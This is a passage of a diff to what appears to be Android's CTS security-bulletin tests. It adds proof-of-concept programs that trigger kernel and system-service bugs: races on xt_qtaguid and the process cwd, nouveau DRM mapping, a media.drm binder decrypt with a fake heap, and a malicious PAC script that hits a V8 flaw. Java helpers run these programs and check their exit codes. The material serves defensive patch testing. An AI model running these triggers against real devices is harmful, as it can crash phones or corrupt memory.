+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define MAX_THREAD 6
+
+int ctrl_fd;
+static int cmd;
+static int status[MAX_THREAD];
+static int sock_fd;
+
+void *thread_entry(void *arg) {
+ int index, len = 256, ret;
+ char buf[256];
+ index = (int)(unsigned long)arg;
+ memset(buf, 0x0, 256);
+ status[index] = 1;
+
+ // cmd =-1 signifies error in thread creation
+ while (cmd != 1 && cmd != -1) {
+ usleep(5);
+ }
+
+ if (cmd != -1) {
+ switch (index % 3) {
+ case 0:
+ len = sprintf(buf, "d %lu", (unsigned long)0);
+ break;
+ case 2:
+ len = sprintf(buf, "t %d", sock_fd);
+ break;
+ }
+
+ ret = write(ctrl_fd, buf, len);
+ }
+
+ status[index] = 2;
+ return NULL;
+}
+/*
+ *This PoC creates multiple threads to write /proc/net/xt_qtaguid/ctrl device
+ *which causes null pointer derefrences in netstat.
+ */
+int main() {
+ int fd, retry = 1024;
+ int ret, i, loop;
+ pthread_t tid[MAX_THREAD];
+
+ fork();
+ sock_fd = socket(AF_INET, SOCK_STREAM, 0);
+ while (retry--) {
+ cmd = 0;
+ for (i = 0; i < MAX_THREAD; i++) {
+ status[i] = 0;
+ }
+
+ fd = open("/dev/xt_qtaguid", O_RDONLY);
+ if (fd < 0) {
+ return -1;
+ }
+
+ ctrl_fd = open("/proc/net/xt_qtaguid/ctrl", O_RDWR);
+ if (ctrl_fd < 0) {
+ return -1;
+ }
+
+ for (i = 0; i < MAX_THREAD; i++) {
+ ret =
+ pthread_create(&tid[i], NULL, thread_entry, (void *)(unsigned long)i);
+ if (ret != 0) {
+ cmd = -1;
+ close(ctrl_fd);
+ }
+ }
+
+ loop = 1;
+ int count = 0;
+ // loop until all threads have status == 1
+ while (loop) {
+ loop = 0;
+ count = count + 1;
+ for (i = 0; i < MAX_THREAD; i++)
+ if (status[i] != 1) {
+ loop = 1;
+ break;
+ }
+
+ if (loop) {
+ usleep(5);
+ }
+ }
+
+ cmd = 1;
+ loop = 1;
+ while (loop) {
+ loop = 0;
+ count = count + 1;
+ for (i = 0; i < MAX_THREAD; i++)
+ if (status[i] != 2) {
+ loop = 1;
+ break;
+ }
+
+ if (loop) {
+ usleep(5);
+ }
+ }
+ close(fd);
+ }
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/Android.mk
index b4697d5..64ecb5c 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/Android.mk
@@ -10,7 +10,7 @@
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
-# limitations under the License.
+# limitations under the License
LOCAL_PATH := $(call my-dir)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/poc.c
index 1637bd6..5bdd33d 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/poc.c
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-6262/poc.c
@@ -10,26 +10,25 @@
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions vand
+ * See the License for the specific language governing permissions and
* limitations under the License.
*/
#define _GNU_SOURCE
-#include "local_poc.h"
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
-#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
+#include "local_poc.h"
+#include "../includes/common.h"
#define DRMDEV_NAME "/dev/dri/renderD128"
+#define MAX_MAPS 10
-static int drm_version(int fd)
-{
- int ret;
+static int drm_version(int fd) {
struct drm_version ver;
ver.name_len = 100;
ver.date_len = 100;
@@ -39,17 +38,14 @@
ver.date = (char*)malloc(ver.date_len);
ver.desc = (char*)malloc(ver.desc_len);
- ret = ioctl(fd, DRM_IOCTL_VERSION, &ver);
-
- if (ret == -1) {
- return -1;
+ if (ioctl(fd, DRM_IOCTL_VERSION, &ver) < 0) {
+ close(fd);
+ exit(EXIT_FAILURE);
}
return 0;
}
-static int nouveau_gem_ioctl_new(int fd)
-{
- int ret;
+static uint32_t nouveau_gem_ioctl_new(int fd) {
struct drm_nouveau_gem_new new_arg;
memset(&new_arg, 0, sizeof(new_arg));
@@ -57,66 +53,43 @@
new_arg.info.size = 0x1000;
new_arg.info.domain = NOUVEAU_GEM_DOMAIN_GART;
- ret = ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_NEW, &new_arg);
- if (ret == -1) {
- return -1;
+ if (ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_NEW, &new_arg) < 0) {
+ close(fd);
+ exit(EXIT_FAILURE);
}
-
return new_arg.info.handle;
}
-static uint32_t get_gem_map_handle(int fd)
-{
- uint32_t handle;
-
- handle = nouveau_gem_ioctl_new(fd);
-
- return handle;
-}
-
-static void nouveau_gem_ioctl_map(int fd, uint32_t handle)
-{
- int ret;
+static void nouveau_gem_ioctl_map(int fd, uint32_t handle) {
struct drm_nouveau_gem_map map_arg;
memset(&map_arg, 0, sizeof(map_arg));
map_arg.handle = handle;
map_arg.length = 0x1000;
- ret = ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_MAP, &map_arg);
- if (ret == -1) {
- return;
+ if (ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_MAP, &map_arg) < 0) {
+ close(fd);
+ exit(EXIT_FAILURE);
}
}
-void poc()
-{
+int main() {
int fd;
- const int MAX_MAPS = 10;
+ time_t test_started = start_timer();
- fd = open(DRMDEV_NAME, O_RDWR);
- if (fd == -1) {
- return;
+ while (timer_active(test_started)) {
+ fd = open(DRMDEV_NAME, O_RDWR);
+ if (fd < 0) {
+ return -1;
+ }
+
+ drm_version(fd);
+
+ uint32_t handle = nouveau_gem_ioctl_new(fd);
+
+ for (int i = 0; i < MAX_MAPS; i++) {
+ nouveau_gem_ioctl_map(fd, handle);
+ }
+ close(fd);
}
-
- if (drm_version(fd) == -1){
- return;
- }
-
- uint32_t handle = get_gem_map_handle(fd);
-
- for(int i = 0; i < MAX_MAPS; i++){
- nouveau_gem_ioctl_map(fd, handle);
- }
- close(fd);
-
- return;
-}
-
-int main()
-{
- const int MAX_RUNS = 30000;
-
- for(int i = 0; i < MAX_RUNS; i++) {
- poc();
- }
+ return 0;
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9424/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9424/Android.mk
new file mode 100644
index 0000000..0615108
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9424/Android.mk
@@ -0,0 +1,38 @@
+#
+#copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2018-9424
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+
+LOCAL_SHARED_LIBRARIES := libbinder \
+ libutils \
+ libcutils
+
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CPPFLAGS += -Wall -Werror
+LOCAL_CPPFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9424/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9424/poc.cpp
new file mode 100644
index 0000000..88dfad6
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9424/poc.cpp
@@ -0,0 +1,149 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions vand
+ * limitations under the License.
+ */
+
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <binder/IMemory.h>
+#include <binder/IServiceManager.h>
+#include <binder/MemoryDealer.h>
+#include <binder/Parcel.h>
+#include <cutils/ashmem.h>
+#include <utils/String8.h>
+
+using namespace android;
+
+#define MAKE_CRYPTO (IBinder::FIRST_CALL_TRANSACTION)
+#define CREATE_PLUGIN (IBinder::FIRST_CALL_TRANSACTION + 2)
+#define DECRYPT (IBinder::FIRST_CALL_TRANSACTION + 5)
+#define SET_HEAP (IBinder::FIRST_CALL_TRANSACTION + 8)
+
+class MyMemoryHeap : public virtual BnMemoryHeap {
+public:
+ MyMemoryHeap(int fd) { mFd = fd; }
+ int getHeapID() const { return mFd; }
+ void *getBase() const { return NULL; }
+ size_t getSize() const { return 4096 * 4096; }
+ uint32_t getFlags() const { return 0; }
+ uint32_t getOffset() const { return 0; }
+
+private:
+ mutable int mFd;
+};
+
+sp<IBinder> crypto_binder;
+
+void make_crypto() {
+
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> drm_binder = sm->getService(String16("media.drm"));
+
+ Parcel data, reply;
+
+ data.writeInterfaceToken(String16("android.media.IMediaDrmService"));
+
+ drm_binder->transact(MAKE_CRYPTO, data, &reply, 0);
+
+ crypto_binder = reply.readStrongBinder();
+}
+
+void create_plugin() {
+
+ Parcel data, reply;
+
+ data.writeInterfaceToken(String16("android.hardware.ICrypto"));
+
+ uint8_t uuid[16] = {0x10, 0x77, 0xef, 0xec, 0xc0, 0xb2, 0x4d, 0x02,
+ 0xac, 0xe3, 0x3c, 0x1e, 0x52, 0xe2, 0xfb, 0x4b};
+ data.write(uuid, 16);
+
+ data.writeInt32(0);
+
+ crypto_binder->transact(CREATE_PLUGIN, data, &reply, 0);
+}
+
+int set_heap() {
+
+ Parcel data, reply;
+
+ data.writeInterfaceToken(String16("android.hardware.ICrypto"));
+ int fd = ashmem_create_region("ele7enxxh", 4096);
+ sp<IMemoryHeap> heap = new MyMemoryHeap(fd);
+ data.writeStrongBinder(IInterface::asBinder(heap));
+
+ crypto_binder->transact(SET_HEAP, data, &reply, 0);
+
+ return reply.readInt32();
+}
+
+void decrypt() {
+
+ Parcel data, reply;
+
+ data.writeInterfaceToken(String16("android.hardware.ICrypto"));
+ data.writeInt32(0);
+ data.writeInt32(0);
+ data.writeInt32(0);
+
+ uint8_t key[16];
+ memset(key, 0, 16);
+ data.write(key, 16);
+ uint8_t iv[16];
+ memset(iv, 0, 16);
+ data.write(iv, 16);
+
+ // totalsize
+ data.writeInt32(4096 * 4);
+
+ sp<MemoryDealer> memoryDealer = new MemoryDealer(4096 * 4);
+ sp<IMemory> mem = memoryDealer->allocate(4096 * 4);
+ data.writeStrongBinder(IInterface::asBinder(mem));
+
+ // source.mHeapSeqNum
+ data.writeInt32(0);
+
+ // offset
+ data.writeInt32(0);
+
+ // numSubSamples
+ data.writeInt32(1);
+
+ // numBytesOfClearData
+ data.writeInt32(4096 * 4);
+
+ // numBytesOfEncryptedData
+ data.writeInt32(0);
+
+ // destination.mType
+ data.writeInt32(0);
+
+ // destination.mSharedMemory
+ data.writeStrongBinder(IInterface::asBinder(mem));
+
+ crypto_binder->transact(DECRYPT, data, &reply, 0);
+}
+
+int main() {
+
+ make_crypto();
+
+ create_plugin();
+
+ set_heap();
+
+ decrypt();
+
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk
new file mode 100644
index 0000000..8ca5f7e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk
@@ -0,0 +1,40 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2018-9490
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES:= \
+ $(TOP)/external/chromium-libpac/src \
+ $(TOP)/external/v8 \
+
+LOCAL_SHARED_LIBRARIES := \
+ libpac \
+ libutils \
+ libandroid_runtime \
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CPPFLAGS = -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/poc.cpp
new file mode 100644
index 0000000..242d2af
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/poc.cpp
@@ -0,0 +1,67 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef _GNU_SOURCE
+#define _GNU_SOURCE
+#endif
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <iostream>
+#include <utils/String8.h>
+#include <utils/String16.h>
+#include <proxy_resolver_v8.h>
+#include <proxy_resolver_js_bindings.h>
+
+android::String16 url ("");
+android::String16 host ("");
+android::String16 script(
+ "function FindProxyForURL(url, host){\n" \
+ " alert(\"enter\");\n" \
+ " let arr = [];\n" \
+ " arr[1000] = 0x1234;\n" \
+ "\n" \
+ " arr.__defineGetter__(256, function () {\n" \
+ " delete arr[256];\n" \
+ " arr.unshift(1.1);\n" \
+ " arr.length = 0;\n" \
+ " });\n" \
+ "\n" \
+ " Object.entries(arr).toString();\n" \
+ " alert(JSON.stringify(entries));\n" \
+ "\n" \
+ " return 0;\n" \
+ "}\n");
+
+class MyErrorListener : public net::ProxyErrorListener {
+ public:
+ virtual void AlertMessage(android::String16) {
+ }
+
+ virtual void ErrorMessage(android::String16) {
+ }
+};
+
+int main(void) {
+
+ net::ProxyResolverJSBindings *bindings = net::ProxyResolverJSBindings::CreateDefault();
+ MyErrorListener errorListener;
+ net::ProxyResolverV8 resolver(bindings, &errorListener);
+ android::String16 results;
+
+ resolver.SetPacScript(script);
+ resolver.GetProxyForURL(url, host, &results);
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/Android.mk
new file mode 100644
index 0000000..3c8d79c
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/Android.mk
@@ -0,0 +1,30 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2018-9515
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS := -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/poc.c
new file mode 100644
index 0000000..a89d596
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/poc.c
@@ -0,0 +1,75 @@
+#define _GNU_SOURCE
+#include <pthread.h>
+#include <err.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <string.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include "../includes/common.h"
+
+pid_t looper_pid;
+
+void *uaf_worker(__attribute__ ((unused)) void *unused) {
+ char cwd_path[100];
+ sprintf(cwd_path, "/proc/self/task/%d/cwd", (int)looper_pid);
+
+ time_t timer = start_timer();
+ while (timer_active(timer)) {
+ char symlink_target[1000];
+ int len = readlink(cwd_path, symlink_target, sizeof(symlink_target)-1);
+ if (len > 0) {
+ symlink_target[len] = 0;
+ }
+ }
+
+ return NULL;
+}
+
+void *chaos_worker(__attribute__ ((unused)) void *unused) {
+ if (chdir("/sdcard/Android/data/CVE-2018-9515"))
+ err(1, "chdir");
+ rmdir("subdir");
+
+ time_t timer = start_timer();
+ while (timer_active(timer)) {
+ if (mkdir("subdir", 0777))
+ err(1, "mkdir");
+ if (chdir("subdir"))
+ err(1, "chdir");
+ if (rmdir("../subdir"))
+ err(1, "rmdir");
+ if (chdir(".."))
+ err(1, "chdir");
+ }
+
+ return NULL;
+}
+
+int main(void) {
+ looper_pid = syscall(__NR_gettid);
+
+ pthread_t thread;
+ if (pthread_create(&thread, NULL, uaf_worker, NULL))
+ errx(1, "pthread_create failed");
+
+ pthread_t thread2;
+ if (pthread_create(&thread2, NULL, chaos_worker, NULL))
+ errx(1, "pthread_create failed");
+
+ char my_dir_name[100];
+ sprintf(my_dir_name, "/sdcard/Android/data/CVE-2018-9515/foobar");
+ rmdir(my_dir_name);
+
+ time_t timer = start_timer();
+ while (timer_active(timer)) {
+ if (mkdir(my_dir_name, 0777))
+ err(1, "looper: mkdir");
+ if (rmdir(my_dir_name))
+ err(1, "looper: rmdir");
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/includes/common.h b/hostsidetests/securitybulletin/securityPatch/includes/common.h
new file mode 100644
index 0000000..6800dc9
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/includes/common.h
@@ -0,0 +1,37 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef COMMON_H
+#define COMMON_H
+
+#include <time.h>
+#define MAX_TEST_DURATION 300
+
+// exit status code
+#define EXIT_VULNERABLE 113
+
+time_t start_timer(void);
+int timer_active(time_t timer_started);
+
+time_t start_timer(){
+ return time(NULL);
+}
+
+int timer_active(time_t timer_started){
+ return time(NULL) < (timer_started + MAX_TEST_DURATION);
+}
+
+#endif /* COMMON_H */
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
index 5ac0f87..b9f3b2b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
@@ -20,19 +20,17 @@
import com.android.tradefed.device.CollectingOutputReceiver;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.testtype.DeviceTestCase;
import com.android.tradefed.log.LogUtil.CLog;
-import android.platform.test.annotations.RootPermissionTest;
-
import java.io.BufferedOutputStream;
import java.io.File;
import java.io.FileOutputStream;
-import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
-import java.util.Scanner;
import java.util.concurrent.TimeUnit;
+import java.util.Scanner;
+
+import static org.junit.Assert.*;
public class AdbUtils {
@@ -203,28 +201,41 @@
* @param device device to be ran on
* @param timeout time to wait for output in seconds
*/
+ @Deprecated
public static boolean runPocCheckExitCode(String pocName, ITestDevice device,
int timeout) throws Exception {
- device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
- CollectingOutputReceiver receiver = new CollectingOutputReceiver();
- device.executeShellCommand("/data/local/tmp/" + pocName + " > /dev/null 2>&1; echo $?",
- receiver, timeout, TimeUnit.SECONDS, 0);
-
- String returnStr = null;
- int returnNum = 0;
-
- try{
- returnStr = receiver.getOutput().replaceAll("[^0-9]", "");
- }catch(NullPointerException e){
- return false;
- }
- try{
- returnNum = Integer.parseInt(returnStr);
- }catch(NumberFormatException e){
- return false;
- }
//Refer to go/asdl-sts-guide Test section for knowing the significance of 113 code
- return returnNum == 113;
+ return runPocGetExitStatus(pocName, device, timeout) == 113;
+ }
+
+ /**
+ * Pushes and runs a binary to the device and returns the exit status.
+ * @param pocName a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+
+ */
+ public static int runPocGetExitStatus(String pocName, ITestDevice device, int timeout)
+ throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ CollectingOutputReceiver receiver = new CollectingOutputReceiver();
+ device.executeShellCommand("/data/local/tmp/" + pocName + " > /dev/null 2>&1; echo $?",
+ receiver, timeout, TimeUnit.SECONDS, 0);
+
+ String exitStatus = receiver.getOutput().replaceAll("[^0-9]", "");
+ return Integer.parseInt(exitStatus);
+ }
+
+ /**
+ * Pushes and runs a binary and asserts that the exit status isn't 113: vulnerable.
+ * @param pocName a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ */
+ public static void runPocAssertExitStatusNotVulnerable(
+ String pocName, ITestDevice device, int timeout) throws Exception {
+ assertTrue("PoC returned exit status 113: vulnerable",
+ runPocGetExitStatus(pocName, device, timeout) != 113);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java b/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java
new file mode 100644
index 0000000..cd39c56
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java
@@ -0,0 +1,230 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+import com.android.tradefed.device.BackgroundDeviceAction;
+
+import android.platform.test.annotations.RootPermissionTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+import java.util.regex.Pattern;
+import java.util.regex.Matcher;
+import java.util.Map;
+import java.util.HashMap;
+import java.util.concurrent.ConcurrentHashMap;
+import com.android.ddmlib.MultiLineReceiver;
+import com.android.ddmlib.Log;
+import com.android.ddmlib.TimeoutException;
+import java.lang.ref.WeakReference;
+
+/**
+ * A utility to monitor the device lowmemory state and reboot when low. Without this, tests that
+ * cause an OOM can sometimes cause ADB to become unresponsive indefinitely. Usage is to create an
+ * instance per instance of SecurityTestCase and call start() and stop() matching to
+ * SecurityTestCase setup() and teardown().
+ */
+public class HostsideOomCatcher {
+
+ private static final String LOG_TAG = "HostsideOomCatcher";
+
+ private static final long LOW_MEMORY_DEVICE_THRESHOLD_KB = 1024 * 1024; // 1GB
+ private static Map<String, WeakReference<BackgroundDeviceAction>> oomCatchers =
+ new ConcurrentHashMap<>();
+ private static Map<String, Long> totalMemories = new ConcurrentHashMap<>();
+
+ private boolean isLowMemoryDevice = false;
+
+ private SecurityTestCase context;
+
+ /**
+ * test behavior when oom is detected.
+ */
+ public enum OomBehavior {
+ FAIL_AND_LOG, // normal behavior
+ PASS_AND_LOG, // skip tests that oom low memory devices
+ FAIL_NO_LOG, // tests that check for oom
+ }
+ private OomBehavior oomBehavior = OomBehavior.FAIL_AND_LOG; // accessed across threads
+ private boolean oomDetected = false; // accessed across threads
+
+ public HostsideOomCatcher(SecurityTestCase context) {
+ this.context = context;
+ }
+
+ /**
+ * Utility to get the device memory total by reading /proc/meminfo and returning MemTotal
+ */
+ private static long getMemTotal(ITestDevice device) throws DeviceNotAvailableException {
+ String memInfo = device.executeShellCommand("cat /proc/meminfo");
+ Pattern pattern = Pattern.compile("MemTotal:\\s*(.*?)\\s*[kK][bB]");
+ Matcher matcher = pattern.matcher(memInfo);
+ if (matcher.find()) {
+ return Long.parseLong(matcher.group(1));
+ } else {
+ throw new RuntimeException("Could not get device memory total");
+ }
+ }
+
+ /**
+ * Start the hostside oom catcher thread for the test.
+ * Match this call to SecurityTestCase.setup().
+ */
+ public synchronized void start() throws Exception {
+ // cache device TotalMem to avoid and adb shell for every test.
+ Long totalMemory = totalMemories.get(getDevice().getSerialNumber());
+ if (totalMemory == null) {
+ totalMemory = getMemTotal(getDevice());
+ totalMemories.put(getDevice().getSerialNumber(), totalMemory);
+ }
+ isLowMemoryDevice = totalMemory < LOW_MEMORY_DEVICE_THRESHOLD_KB;
+
+ // reset test oom behavior
+ // Low memory devices should skip (pass) tests when OOMing and log so that the
+ // high-memory-test flag can be added. Normal devices should fail tests that OOM so that
+ // they'll be ran again with --retry. If the test OOMs because previous tests used the
+ // memory, it will likely pass on a second try.
+ if (isLowMemoryDevice) {
+ oomBehavior = OomBehavior.PASS_AND_LOG;
+ } else {
+ oomBehavior = OomBehavior.FAIL_AND_LOG;
+ }
+ oomDetected = false;
+
+ // Cache OOM detection in separate persistent threads for each device.
+ WeakReference<BackgroundDeviceAction> reference =
+ oomCatchers.get(getDevice().getSerialNumber());
+ BackgroundDeviceAction oomCatcher = null;
+ if (reference != null) {
+ oomCatcher = reference.get();
+ }
+ if (oomCatcher == null || !oomCatcher.isAlive() || oomCatcher.isCancelled()) {
+ AdbUtils.runCommandLine("am start com.android.cts.oomcatcher/.OomCatcher", getDevice());
+
+ oomCatcher = new BackgroundDeviceAction(
+ "logcat -c && logcat OomCatcher:V *:S",
+ "Oom Catcher background thread",
+ getDevice(), new OomReceiver(getDevice()), 0);
+
+ oomCatchers.put(getDevice().getSerialNumber(), new WeakReference<>(oomCatcher));
+ oomCatcher.start();
+ }
+ }
+
+ /**
+ * Stop the hostside oom catcher thread.
+ * Match this call to SecurityTestCase.setup().
+ */
+ public static void stop(String serial) {
+ WeakReference<BackgroundDeviceAction> reference = oomCatchers.get(serial);
+ if (reference != null) {
+ BackgroundDeviceAction oomCatcher = reference.get();
+ if (oomCatcher != null) {
+ oomCatcher.cancel();
+ }
+ }
+ }
+
+ /**
+ * Check every test teardown to see if the device oomed during the test.
+ */
+ public synchronized boolean isOomDetected() {
+ return oomDetected;
+ }
+
+ /**
+ * Return the current test behavior for when oom is detected.
+ */
+ public synchronized OomBehavior getOomBehavior() {
+ return oomBehavior;
+ }
+
+ /**
+ * Flag meaning the test will likely fail on devices with low memory.
+ */
+ public synchronized void setHighMemoryTest() {
+ if (isLowMemoryDevice) {
+ oomBehavior = OomBehavior.PASS_AND_LOG;
+ } else {
+ oomBehavior = OomBehavior.FAIL_AND_LOG;
+ }
+ }
+
+ /**
